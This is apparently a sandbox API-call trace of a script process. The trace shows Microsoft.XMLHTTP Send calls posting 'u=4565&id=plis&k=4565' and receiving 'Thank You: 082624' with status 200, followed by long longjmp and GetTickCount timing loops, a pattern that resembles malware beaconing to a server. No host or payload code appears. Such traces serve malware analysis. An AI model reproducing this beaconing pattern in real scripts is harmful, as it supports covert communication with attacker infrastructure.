	[0120.131] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0120.131] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0120.131] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0120.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0120.131] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0120.131] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0120.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0120.132] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0120.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0120.132] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a62348 | out: ppvObject=0x5a62348*=0x0) returned 0x80004002
	[0120.132] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0120.132] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0120.132] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x5a54038 | out: ppvObject=0x5a54038*=0x0) returned 0x80004002
	[0120.132] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0130.376] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0130.376] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0130.376] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0130.376] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0130.376] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0130.376] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 082624", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0130.376] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0130.377] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0130.377] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0130.377] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0130.377] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0130.377] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0130.377] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0130.378] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0130.378] malloc (_Size=0xb0) returned 0x42e060
	[0130.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0130.380] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0130.380] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0130.380] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0130.380] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0130.380] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0130.381] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0130.381] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0130.381] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0130.384] longjmp () 
	[0130.385] longjmp () 
	[0130.385] longjmp () 
	[0130.385] GetCurrentThreadId () returned 0x9a8
	[0130.385] GetCurrentThreadId () returned 0x9a8
	[0130.385] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0130.385] malloc (_Size=0x80) returned 0x3c88b0
	[0130.385] longjmp () 
	[0130.386] GetTickCount () returned 0x11578f7
	[0130.386] GetTickCount () returned 0x11578f7
	[0130.386] longjmp () 
	[0130.386] longjmp () 
	[0130.386] longjmp () 
	[0130.387] longjmp () 
	[0130.387] longjmp () 
	[0130.387] longjmp () 
	[0130.387] longjmp () 
	[0130.387] longjmp () 
	[0130.388] longjmp () 
	[0130.388] longjmp () 
	[0130.388] longjmp () 
	[0130.388] longjmp () 
	[0130.389] longjmp () 
	[0130.389] longjmp () 
	[0130.389] longjmp () 
	[0130.389] longjmp () 
	[0130.389] longjmp () 
	[0130.390] longjmp () 
	[0130.390] longjmp () 
	[0130.390] longjmp () 
	[0130.390] longjmp () 
	[0130.390] longjmp () 
	[0130.390] longjmp () 
	[0130.391] longjmp () 
	[0130.391] longjmp () 
	[0130.391] longjmp () 
	[0130.391] longjmp () 
	[0130.391] longjmp () 
	[0130.392] longjmp () 
	[0130.392] longjmp () 
	[0130.392] longjmp () 
	[0130.392] longjmp () 
	[0130.392] GetTickCount () returned 0x11578f7
	[0130.393] longjmp () 
	[0130.393] longjmp () 
	[0130.393] longjmp () 
	[0130.393] longjmp () 
	[0130.393] longjmp () 
	[0130.394] longjmp () 
	[0130.394] longjmp () 
	[0130.394] longjmp () 
	[0130.394] longjmp () 
	[0130.394] longjmp () 
	[0130.395] longjmp () 
	[0130.395] longjmp () 
	[0130.395] longjmp () 
	[0130.395] longjmp () 
	[0130.395] longjmp () 
	[0130.396] longjmp () 
	[0130.396] longjmp () 
	[0130.396] longjmp () 
	[0130.396] longjmp () 
	[0130.396] longjmp () 
	[0130.397] longjmp () 
	[0130.397] longjmp () 
	[0130.397] longjmp () 
	[0130.398] longjmp () 
	[0130.398] longjmp () 
	[0130.399] longjmp () 
	[0130.399] longjmp () 
	[0130.399] longjmp () 
	[0130.399] longjmp () 
	[0130.399] longjmp () 
	[0130.400] longjmp () 
	[0130.400] longjmp () 
	[0130.400] GetTickCount () returned 0x11578f7
	[0130.400] longjmp () 
	[0130.400] longjmp () 
	[0130.401] longjmp () 
	[0130.401] longjmp () 
	[0130.402] longjmp () 
	[0130.402] longjmp () 
	[0130.402] longjmp () 
	[0130.402] longjmp () 
	[0130.403] longjmp () 
	[0130.403] longjmp () 
	[0130.403] longjmp () 
	[0130.403] longjmp () 
	[0130.403] longjmp () 
	[0130.404] longjmp () 
	[0130.404] longjmp () 
	[0130.404] longjmp () 
	[0130.404] longjmp () 
	[0130.404] longjmp () 
	[0130.405] longjmp () 
	[0130.405] longjmp () 
	[0130.405] longjmp () 
	[0130.405] longjmp () 
	[0130.406] longjmp () 
	[0130.406] longjmp () 
	[0130.406] longjmp () 
	[0130.406] longjmp () 
	[0130.406] longjmp () 
	[0130.407] longjmp () 
	[0130.407] longjmp () 
	[0130.407] longjmp () 
	[0130.407] longjmp () 
	[0130.407] longjmp () 
	[0130.408] GetTickCount () returned 0x1157907
	[0130.408] longjmp () 
	[0130.408] longjmp () 
	[0130.408] longjmp () 
	[0130.408] longjmp () 
	[0130.409] longjmp () 
	[0130.409] longjmp () 
	[0130.409] longjmp () 
	[0130.410] longjmp () 
	[0130.410] longjmp () 
	[0130.410] longjmp () 
	[0130.410] longjmp () 
	[0130.410] longjmp () 
	[0130.411] longjmp () 
	[0130.411] longjmp () 
	[0130.411] longjmp () 
	[0130.411] longjmp () 
	[0130.412] longjmp () 
	[0130.412] longjmp () 
	[0130.412] longjmp () 
	[0130.412] longjmp () 
	[0130.412] longjmp () 
	[0130.413] longjmp () 
	[0130.413] longjmp () 
	[0130.413] longjmp () 
	[0130.413] longjmp () 
	[0130.413] longjmp () 
	[0130.414] longjmp () 
	[0130.414] longjmp () 
	[0130.414] longjmp () 
	[0130.414] longjmp () 
	[0130.414] longjmp () 
	[0130.414] longjmp () 
	[0130.415] GetTickCount () returned 0x1157907
	[0130.415] longjmp () 
	[0130.415] longjmp () 
	[0130.415] longjmp () 
	[0130.415] longjmp () 
	[0130.416] longjmp () 
	[0130.416] longjmp () 
	[0130.416] longjmp () 
	[0130.416] longjmp () 
	[0130.416] longjmp () 
	[0130.417] longjmp () 
	[0130.417] longjmp () 
	[0130.417] longjmp () 
	[0130.417] longjmp () 
	[0130.418] longjmp () 
	[0130.418] longjmp () 
	[0130.418] longjmp () 
	[0130.418] longjmp () 
	[0130.418] longjmp () 
	[0130.418] longjmp () 
	[0130.419] longjmp () 
	[0130.419] longjmp () 
	[0130.419] longjmp () 
	[0130.419] longjmp () 
	[0130.419] longjmp () 
	[0130.420] longjmp () 
	[0130.420] longjmp () 
	[0130.420] longjmp () 
	[0130.420] longjmp () 
	[0130.420] longjmp () 
	[0130.421] longjmp () 
	[0130.421] longjmp () 
	[0130.421] longjmp () 
	[0130.421] GetTickCount () returned 0x1157917
	[0130.421] longjmp () 
	[0130.421] longjmp () 
	[0130.422] longjmp () 
	[0130.422] longjmp () 
	[0130.422] longjmp () 
	[0130.422] longjmp () 
	[0130.422] longjmp () 
	[0130.423] longjmp () 
	[0130.423] longjmp () 
	[0130.423] longjmp () 
	[0130.423] longjmp () 
	[0130.423] longjmp () 
	[0130.424] longjmp () 
	[0130.424] longjmp () 
	[0130.424] longjmp () 
	[0130.424] longjmp () 
	[0130.424] longjmp () 
	[0130.425] longjmp () 
	[0130.425] longjmp () 
	[0130.425] longjmp () 
	[0130.425] longjmp () 
	[0130.425] longjmp () 
	[0130.426] longjmp () 
	[0130.426] longjmp () 
	[0130.426] longjmp () 
	[0130.426] longjmp () 
	[0130.426] longjmp () 
	[0130.427] longjmp () 
	[0130.427] longjmp () 
	[0130.427] longjmp () 
	[0130.427] longjmp () 
	[0130.427] longjmp () 
	[0130.428] GetTickCount () returned 0x1157917
	[0130.428] longjmp () 
	[0130.428] longjmp () 
	[0130.428] longjmp () 
	[0130.428] longjmp () 
	[0130.428] longjmp () 
	[0130.429] longjmp () 
	[0130.429] longjmp () 
	[0130.429] longjmp () 
	[0130.429] longjmp () 
	[0130.429] longjmp () 
	[0130.430] longjmp () 
	[0130.430] longjmp () 
	[0130.430] longjmp () 
	[0130.430] longjmp () 
	[0130.431] longjmp () 
	[0130.431] longjmp () 
	[0130.431] longjmp () 
	[0130.431] longjmp () 
	[0130.432] longjmp () 
	[0130.432] longjmp () 
	[0130.432] longjmp () 
	[0130.432] longjmp () 
	[0130.433] longjmp () 
	[0130.433] longjmp () 
	[0130.433] longjmp () 
	[0130.433] longjmp () 
	[0130.434] longjmp () 
	[0130.434] longjmp () 
	[0130.434] longjmp () 
	[0130.434] longjmp () 
	[0130.434] longjmp () 
	[0130.434] longjmp () 
	[0130.435] GetTickCount () returned 0x1157926
	[0130.435] longjmp () 
	[0130.435] longjmp () 
	[0130.435] longjmp () 
	[0130.435] longjmp () 
	[0130.436] longjmp () 
	[0130.436] longjmp () 
	[0130.436] longjmp () 
	[0130.436] longjmp () 
	[0130.436] longjmp () 
	[0130.437] longjmp () 
	[0130.437] longjmp () 
	[0130.437] longjmp () 
	[0130.437] longjmp () 
	[0130.437] longjmp () 
	[0130.438] longjmp () 
	[0130.438] longjmp () 
	[0130.438] longjmp () 
	[0130.438] longjmp () 
	[0130.438] longjmp () 
	[0130.439] longjmp () 
	[0130.439] longjmp () 
	[0130.439] longjmp () 
	[0130.439] longjmp () 
	[0130.439] longjmp () 
	[0130.440] longjmp () 
	[0130.440] longjmp () 
	[0130.440] longjmp () 
	[0130.440] longjmp () 
	[0130.440] longjmp () 
	[0130.441] longjmp () 
	[0130.441] longjmp () 
	[0130.441] longjmp () 
	[0130.441] GetTickCount () returned 0x1157926
	[0130.441] longjmp () 
	[0130.441] longjmp () 
	[0130.442] longjmp () 
	[0130.442] longjmp () 
	[0130.442] longjmp () 
	[0130.442] longjmp () 
	[0130.442] longjmp () 
	[0130.442] longjmp () 
	[0130.443] longjmp () 
	[0130.443] longjmp () 
	[0130.443] longjmp () 
	[0130.443] longjmp () 
	[0130.444] longjmp () 
	[0130.444] longjmp () 
	[0130.444] longjmp () 
	[0130.444] longjmp () 
	[0130.444] longjmp () 
	[0130.444] longjmp () 
	[0130.445] longjmp () 
	[0130.445] longjmp () 
	[0130.445] longjmp () 
	[0130.445] longjmp () 
	[0130.446] longjmp () 
	[0130.446] longjmp () 
	[0130.446] longjmp () 
	[0130.446] longjmp () 
	[0130.446] longjmp () 
	[0130.446] longjmp () 
	[0130.447] longjmp () 
	[0130.447] longjmp () 
	[0130.447] longjmp () 
	[0130.447] longjmp () 
	[0130.447] GetTickCount () returned 0x1157926
	[0130.447] longjmp () 
	[0130.448] longjmp () 
	[0130.448] longjmp () 
	[0130.448] longjmp () 
	[0130.448] longjmp () 
	[0130.449] longjmp () 
	[0130.449] longjmp () 
	[0130.449] longjmp () 
	[0130.449] longjmp () 
	[0130.449] longjmp () 
	[0130.450] longjmp () 
	[0130.450] longjmp () 
	[0130.450] longjmp () 
	[0130.450] longjmp () 
	[0130.450] longjmp () 
	[0130.451] longjmp () 
	[0130.451] longjmp () 
	[0130.451] longjmp () 
	[0130.451] longjmp () 
	[0130.451] longjmp () 
	[0130.452] longjmp () 
	[0130.452] longjmp () 
	[0130.452] longjmp () 
	[0130.452] longjmp () 
	[0130.452] longjmp () 
	[0130.453] longjmp () 
	[0130.453] longjmp () 
	[0130.453] longjmp () 
	[0130.453] longjmp () 
	[0130.453] longjmp () 
	[0130.454] longjmp () 
	[0130.454] longjmp () 
	[0130.454] GetTickCount () returned 0x1157936
	[0130.454] longjmp () 
	[0130.454] longjmp () 
	[0130.455] longjmp () 
	[0130.455] longjmp () 
	[0130.455] longjmp () 
	[0130.455] longjmp () 
	[0130.455] longjmp () 
	[0130.455] longjmp () 
	[0130.456] longjmp () 
	[0130.456] longjmp () 
	[0130.456] longjmp () 
	[0130.456] longjmp () 
	[0130.456] longjmp () 
	[0130.457] longjmp () 
	[0130.457] longjmp () 
	[0130.457] longjmp () 
	[0130.457] longjmp () 
	[0130.457] longjmp () 
	[0130.457] longjmp () 
	[0130.458] longjmp () 
	[0130.458] longjmp () 
	[0130.458] longjmp () 
	[0130.458] longjmp () 
	[0130.458] longjmp () 
	[0130.458] longjmp () 
	[0130.459] longjmp () 
	[0130.459] longjmp () 
	[0130.459] longjmp () 
	[0130.459] longjmp () 
	[0130.459] longjmp () 
	[0130.460] longjmp () 
	[0130.460] longjmp () 
	[0130.460] GetTickCount () returned 0x1157936
	[0130.460] longjmp () 
	[0130.460] longjmp () 
	[0130.460] longjmp () 
	[0130.460] longjmp () 
	[0130.461] longjmp () 
	[0130.461] longjmp () 
	[0130.461] longjmp () 
	[0130.461] longjmp () 
	[0130.461] longjmp () 
	[0130.461] longjmp () 
	[0130.462] longjmp () 
	[0130.462] longjmp () 
	[0130.462] longjmp () 
	[0130.462] longjmp () 
	[0130.462] longjmp () 
	[0130.462] longjmp () 
	[0130.463] longjmp () 
	[0130.463] longjmp () 
	[0130.463] longjmp () 
	[0130.463] longjmp () 
	[0130.463] longjmp () 
	[0130.464] longjmp () 
	[0130.464] longjmp () 
	[0130.464] longjmp () 
	[0130.464] longjmp () 
	[0130.464] longjmp () 
	[0130.464] longjmp () 
	[0130.465] longjmp () 
	[0130.465] longjmp () 
	[0130.465] longjmp () 
	[0130.465] longjmp () 
	[0130.465] longjmp () 
	[0130.465] GetTickCount () returned 0x1157945
	[0130.466] longjmp () 
	[0130.466] longjmp () 
	[0130.466] longjmp () 
	[0130.466] longjmp () 
	[0130.466] longjmp () 
	[0130.466] longjmp () 
	[0130.467] longjmp () 
	[0130.467] longjmp () 
	[0130.467] longjmp () 
	[0130.467] longjmp () 
	[0130.467] longjmp () 
	[0130.467] longjmp () 
	[0130.468] longjmp () 
	[0130.468] longjmp () 
	[0130.468] longjmp () 
	[0130.468] longjmp () 
	[0130.468] longjmp () 
	[0130.469] longjmp () 
	[0130.469] longjmp () 
	[0130.469] longjmp () 
	[0130.469] longjmp () 
	[0130.469] longjmp () 
	[0130.469] longjmp () 
	[0130.470] longjmp () 
	[0130.470] longjmp () 
	[0130.470] longjmp () 
	[0130.470] longjmp () 
	[0130.470] longjmp () 
	[0130.471] longjmp () 
	[0130.471] longjmp () 
	[0130.471] longjmp () 
	[0130.471] longjmp () 
	[0130.471] GetTickCount () returned 0x1157945
	[0130.471] longjmp () 
	[0130.471] longjmp () 
	[0130.472] longjmp () 
	[0130.472] longjmp () 
	[0130.472] longjmp () 
	[0130.472] longjmp () 
	[0130.472] longjmp () 
	[0130.472] longjmp () 
	[0130.473] longjmp () 
	[0130.473] longjmp () 
	[0130.473] longjmp () 
	[0130.473] longjmp () 
	[0130.475] longjmp () 
	[0130.475] longjmp () 
	[0130.475] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0130.475] SysStringLen (param_1=0x0) returned 0x0
	[0130.475] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0130.476] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0130.476] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0130.476] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0130.476] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5c08) returned 0x0
	[0130.476] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0130.476] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5c08, pUnkSite=0x3cacc0) returned 0x0
